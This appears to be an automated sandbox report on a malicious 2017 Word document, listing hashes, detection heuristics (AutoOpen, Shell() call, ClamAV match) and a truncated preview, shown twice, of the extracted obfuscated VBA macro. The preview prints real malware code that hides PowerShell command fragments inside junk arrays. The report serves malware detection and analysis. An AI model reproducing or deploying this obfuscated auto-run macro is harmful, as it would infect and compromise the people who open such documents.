Office (OLE) malware analysis — malicious · d3e06e4d623b1bbf

MALICIOUS

Office (OLE)

264.5 KB Created: 2017-12-04 06:21:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: c2b856bb53d17d8175597a30904f7b83 SHA-1: 5d5d2eb7060fe78b7273f24fceff046daa42312c SHA-256: d3e06e4d623b1bbf7b72ec709541c3b3fe66d09c4616c356cdc93240bd4b4c6a

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate the presence of AutoOpen macros and a Shell() call, suggesting the execution of arbitrary code. ClamAV detection further confirms its malicious nature, identifying it as 'Doc.Macro.Obfuscation-6389653-0'. The VBA script's obfuscation and use of Shell() strongly imply it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6389653-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 129495 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	129495 bytes
SHA-256: `cd1a833358b502c4496a21b645d5e96974ef06648d12395b23057b5dcd97ce48`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "iSIrrHpZV" Function CdFtpBsQGFIw() mrnTBLs = Array(Trim(Len("vTiOwcczrKPYM" + "HazlsirbIHj")), Trim(Len("XIjwqfsJUJ" + "NmmNitp")), Trim(Len("BjBTUXnqpvUL" + "faFUNtTjjD")), Trim(Len("wZkzGVI" + "SYinWoPaDpCN")), Trim(Len("ziiLhsU" + "VzUjuVunnkUnms")), Trim(Len("znjjwSQudqFAvB" + "ZcohzZNHbTUnP")), Trim(Len("iaOFjlY" + "MWhFFrqpVzlzKr")), Trim(Len("EvYjfINdiApuQr" + "OQPbQRAsUVRlzV"))) pStnLRfAkd = Mid("BY(Zhd+Zhd326Zhd+ZtsG+tsGhdhuas);Zhd+ZhdbreZhd+Zhdak;}catcZhd+ZhdtsG+tsGh{writeZhd+Z4aSUSmKmQAknsoBwol", 3, 82) wjKGziqprHA = Array(Trim(Len("FaZuliVWzhiQz" + "fXLcihuLjdzju")), Trim(Len("ZKksDPrloBMJU" + "rLwAHYTilvdu")), Trim(Len("tuvuEjhznwlMkw" + "jJPVNMUUfzYVVq")), Trim(Len("pPITzrsHHZ" + "kEPNnXaZzbfH")), Trim(Len("iZZQufOMGOGW" + "QACqCHw")), Trim(Len("cQFRLBuvrzK" + "bkYSbMbL")), Trim(Len("ipIqkGZWIYX" + "HGJTwjiT")), Trim(Len("OQwPcfckP" + "jkzwawbbuVZjY"))) AjPNMp = Array(Trim(Len("QuqaJKH" + "spzsCEP")), Trim(Len("ZzakUjjbhECEOO" + "PIdkuEphkH")), Trim(Len("XmQZznEZr" + "XkhjKPtFHCmdS")), Trim(Len("jZTUskPpcFMw" + "HGOApXir")), Trim(Len("wEkovcdEct" + "jpXUjjHYiI")), Trim(Len("TOEmzsCzGks" + "dPkDonMX")), Trim(Len("TcdSiuQIPJJ" + "UkVjJdkCf")), Trim(Len("koduFwdSlVkz" + "lbUQzlp"))) NzYOkXfaKJG = Array(Trim(Len("SVOjkjNNsGuDC" + "urOtcEWsVzQT")), Trim(Len("GqcKWHi" + "POqjZtFfbQrA")), Trim(Len("PcbKvqRZz" + "TRiHXPvYw")), Trim(Len("AicYMDKRMt" + "ZTkrNBAbQNHP")), Trim(Len("WPrmhQf" + "ucQkzDwsfzMGi")), Trim(Len("zzPJOvzjKtPcBz" + "YjwNrirT")), Trim(Len("OzBikNvJ" + "cRtWYBkuOS")), Trim(Len("UWBAhHQPsm" + "GiJuQtOvw"))) knzCKIQUii = Mid("iJ4do);326karZhd+Zhdapas =Zhd+Zhd Zhd+Zhd326tsG+tsGnsadaZ'+'hd+Zhdsd.neZhtsG+tsGd+ZhdxtsG+tsGt(1, tsG+tsG34324Zhd+Zhd5Zhd+Zhd);326huarzMPT2siZzmsn0zt9FX7iTrTrTEiAfNOjjvD", 4, 130) TnwHBdj = Array(Trim(Len("aizJiPTfKbVwj" + "ppopSizYofUjj")), Trim(Len("pMmQpvJF" + "kajJnatODUt")), Trim(Len("fcITKtBuSpuf" + "pwoEHlij")), Trim(Len("DPiVJzuQ" + "PqWKjiziB")), Trim(Len("KNvfEwwc" + "JviLCVZ")), Trim(Len("lpkDABYfoofOK" + "cjaYvHjd")), Trim(Len("LVpGVjfUoK" + "MpREKLWAPJTO")), Trim(Len("CSzldaRJHSYiKv" + "wJTqDYv"))) GjZaAYRmlP = Array(Trim(Len("GHZfRCLvdzPZwm" + "wABdzfQiNLPNd")), Trim(Len("qjTVZOPcVPFE" + "OpzhiWCUsM")), Trim(Len("wSpZLTBoh" + "nRwDWYcU")), Trim(Len("lYtLCsNihqa" + "zTCWHYqQB")), Trim(Len("QWIaYDdLw" + "zNbsFHmjwpT")), Trim(Len("HvqzthPzmEdXIW" + "bTKAWsA")), Trim(Len("jsKQzlJRM" + "SPNkaJwwwnvjDj")), Trim(Len("EKMoozFGiGFj" + "POcmRcqGo"))) OZuZFiiSid = Array(Trim(Len("HAmFpjfHiZR" + "fUjsZDVFj")), Trim(Len("doUQnJXNLOw" + "FLLqrKwWtRYnuY")), Trim(Len("QapLOrcXw" + "YwWkVOCSiPXh")), Trim(Len("MLGNmMPjWOrH" + "VChFdoNFSNcl")), Trim(Len("CVVLJtircA" + "dqKiEBhi")), Trim(Len("isAkcljTdtz" + "bNJtKKFwYvs")), Trim(Len("ZcndiBQ" + "zIpJVkjXJPN")), Trim(Len("DdCcBotrcfEn" + "wKAwGpccRjSYzY"))) HDJsKhzRLQ = Mid("52hDLozzRdv2fzFAtE & ( $enV:cOMSPEc[4,26,25]-JoiN'') ((' (tsG.( SnzSHElLid[1]+SnzSHELLIWNT8ZjOKhrDwEz", 19, 69) aBkzcvYj = Array(Trim(Len("sAEatMVzoajua" + "dXzMIidVZfjkKI")), Trim(Len("atdPTTnkX" + "uJHQJjUn")), Trim(Len("JufdzFOXaYt" + "BMhOjDiH")), Trim(Len("pmZAOZWFQvL" + "izXuQfKEwNLdCs")), Trim(Len("ZCdjpjDTHFdjjs" + "KdhNXMJTQ")), Trim(Len("UCjcbwzVcw" + "nPVPbjP")), Trim(Len("mwdMiCivpVkPj" + "HUdWqjJf")), Trim(Len("DvPXNMzvj" + "idcrpCZtAIAshT"))) jQamHo = Array(Trim(Len("bhpJhJwvZL" + "pHZDREBKWai")), Trim(Len("DZlGlwkDBQ" + "QuqvGqzOan")), Trim(Len("zVDOPOXpBzs" + "ljvCMzpH")), Trim(Len("ZnJIaIuTXLH" + "ZaQDXhVjMOUX")), Trim(Len("EMKnmPlfEZht" + "oGcViok")), Trim(Len("MIfzpRTbNL" + "lVWvkjkvW")), Trim(Len("VAiJRsP" + "rjfnQrD")), Trim(Len("ozzREqNOIjS" + "rputNPrH"))) OSVObD = Array(Trim(Len("VtfIOUZ" + "XcNnvEqlLoR")), Trim(Len("QSiYcHn" + "qujMUwz")), Trim(Len("GSvGlbCwzdVY" + "MAEbolDOGfG")), Trim(Len("YjcsATwHHftt" + "SoPjbzlP")), Tri ... (truncated)

SHA-256: cd1a833358b502c4496a21b645d5e96974ef06648d12395b23057b5dcd97ce48

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iSIrrHpZV"
Function CdFtpBsQGFIw()
mrnTBLs = Array(Trim(Len("vTiOwcczrKPYM" + "HazlsirbIHj")), Trim(Len("XIjwqfsJUJ" + "NmmNitp")), Trim(Len("BjBTUXnqpvUL" + "faFUNtTjjD")), Trim(Len("wZkzGVI" + "SYinWoPaDpCN")), Trim(Len("ziiLhsU" + "VzUjuVunnkUnms")), Trim(Len("znjjwSQudqFAvB" + "ZcohzZNHbTUnP")), Trim(Len("iaOFjlY" + "MWhFFrqpVzlzKr")), Trim(Len("EvYjfINdiApuQr" + "OQPbQRAsUVRlzV")))
pStnLRfAkd = Mid("BY(Zhd+Zhd326Zhd+ZtsG+tsGhdhuas);Zhd+ZhdbreZhd+Zhdak;}catcZhd+ZhdtsG+tsGh{writeZhd+Z4aSUSmKmQAknsoBwol", 3, 82)
wjKGziqprHA = Array(Trim(Len("FaZuliVWzhiQz" + "fXLcihuLjdzju")), Trim(Len("ZKksDPrloBMJU" + "rLwAHYTilvdu")), Trim(Len("tuvuEjhznwlMkw" + "jJPVNMUUfzYVVq")), Trim(Len("pPITzrsHHZ" + "kEPNnXaZzbfH")), Trim(Len("iZZQufOMGOGW" + "QACqCHw")), Trim(Len("cQFRLBuvrzK" + "bkYSbMbL")), Trim(Len("ipIqkGZWIYX" + "HGJTwjiT")), Trim(Len("OQwPcfckP" + "jkzwawbbuVZjY")))
AjPNMp = Array(Trim(Len("QuqaJKH" + "spzsCEP")), Trim(Len("ZzakUjjbhECEOO" + "PIdkuEphkH")), Trim(Len("XmQZznEZr" + "XkhjKPtFHCmdS")), Trim(Len("jZTUskPpcFMw" + "HGOApXir")), Trim(Len("wEkovcdEct" + "jpXUjjHYiI")), Trim(Len("TOEmzsCzGks" + "dPkDonMX")), Trim(Len("TcdSiuQIPJJ" + "UkVjJdkCf")), Trim(Len("koduFwdSlVkz" + "lbUQzlp")))
NzYOkXfaKJG = Array(Trim(Len("SVOjkjNNsGuDC" + "urOtcEWsVzQT")), Trim(Len("GqcKWHi" + "POqjZtFfbQrA")), Trim(Len("PcbKvqRZz" + "TRiHXPvYw")), Trim(Len("AicYMDKRMt" + "ZTkrNBAbQNHP")), Trim(Len("WPrmhQf" + "ucQkzDwsfzMGi")), Trim(Len("zzPJOvzjKtPcBz" + "YjwNrirT")), Trim(Len("OzBikNvJ" + "cRtWYBkuOS")), Trim(Len("UWBAhHQPsm" + "GiJuQtOvw")))
knzCKIQUii = Mid("iJ4do);326karZhd+Zhdapas =Zhd+Zhd Zhd+Zhd326tsG+tsGnsadaZ'+'hd+Zhdsd.neZhtsG+tsGd+ZhdxtsG+tsGt(1, tsG+tsG34324Zhd+Zhd5Zhd+Zhd);326huarzMPT2siZzmsn0zt9FX7iTrTrTEiAfNOjjvD", 4, 130)
TnwHBdj = Array(Trim(Len("aizJiPTfKbVwj" + "ppopSizYofUjj")), Trim(Len("pMmQpvJF" + "kajJnatODUt")), Trim(Len("fcITKtBuSpuf" + "pwoEHlij")), Trim(Len("DPiVJzuQ" + "PqWKjiziB")), Trim(Len("KNvfEwwc" + "JviLCVZ")), Trim(Len("lpkDABYfoofOK" + "cjaYvHjd")), Trim(Len("LVpGVjfUoK" + "MpREKLWAPJTO")), Trim(Len("CSzldaRJHSYiKv" + "wJTqDYv")))
GjZaAYRmlP = Array(Trim(Len("GHZfRCLvdzPZwm" + "wABdzfQiNLPNd")), Trim(Len("qjTVZOPcVPFE" + "OpzhiWCUsM")), Trim(Len("wSpZLTBoh" + "nRwDWYcU")), Trim(Len("lYtLCsNihqa" + "zTCWHYqQB")), Trim(Len("QWIaYDdLw" + "zNbsFHmjwpT")), Trim(Len("HvqzthPzmEdXIW" + "bTKAWsA")), Trim(Len("jsKQzlJRM" + "SPNkaJwwwnvjDj")), Trim(Len("EKMoozFGiGFj" + "POcmRcqGo")))
OZuZFiiSid = Array(Trim(Len("HAmFpjfHiZR" + "fUjsZDVFj")), Trim(Len("doUQnJXNLOw" + "FLLqrKwWtRYnuY")), Trim(Len("QapLOrcXw" + "YwWkVOCSiPXh")), Trim(Len("MLGNmMPjWOrH" + "VChFdoNFSNcl")), Trim(Len("CVVLJtircA" + "dqKiEBhi")), Trim(Len("isAkcljTdtz" + "bNJtKKFwYvs")), Trim(Len("ZcndiBQ" + "zIpJVkjXJPN")), Trim(Len("DdCcBotrcfEn" + "wKAwGpccRjSYzY")))
HDJsKhzRLQ = Mid("52hDLozzRdv2fzFAtE & ( $enV:cOMSPEc[4,26,25]-JoiN'') ((' (tsG.( SnzSHElLid[1]+SnzSHELLIWNT8ZjOKhrDwEz", 19, 69)
aBkzcvYj = Array(Trim(Len("sAEatMVzoajua" + "dXzMIidVZfjkKI")), Trim(Len("atdPTTnkX" + "uJHQJjUn")), Trim(Len("JufdzFOXaYt" + "BMhOjDiH")), Trim(Len("pmZAOZWFQvL" + "izXuQfKEwNLdCs")), Trim(Len("ZCdjpjDTHFdjjs" + "KdhNXMJTQ")), Trim(Len("UCjcbwzVcw" + "nPVPbjP")), Trim(Len("mwdMiCivpVkPj" + "HUdWqjJf")), Trim(Len("DvPXNMzvj" + "idcrpCZtAIAshT")))
jQamHo = Array(Trim(Len("bhpJhJwvZL" + "pHZDREBKWai")), Trim(Len("DZlGlwkDBQ" + "QuqvGqzOan")), Trim(Len("zVDOPOXpBzs" + "ljvCMzpH")), Trim(Len("ZnJIaIuTXLH" + "ZaQDXhVjMOUX")), Trim(Len("EMKnmPlfEZht" + "oGcViok")), Trim(Len("MIfzpRTbNL" + "lVWvkjkvW")), Trim(Len("VAiJRsP" + "rjfnQrD")), Trim(Len("ozzREqNOIjS" + "rputNPrH")))
OSVObD = Array(Trim(Len("VtfIOUZ" + "XcNnvEqlLoR")), Trim(Len("QSiYcHn" + "qujMUwz")), Trim(Len("GSvGlbCwzdVY" + "MAEbolDOGfG")), Trim(Len("YjcsATwHHftt" + "SoPjbzlP")), Tri
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.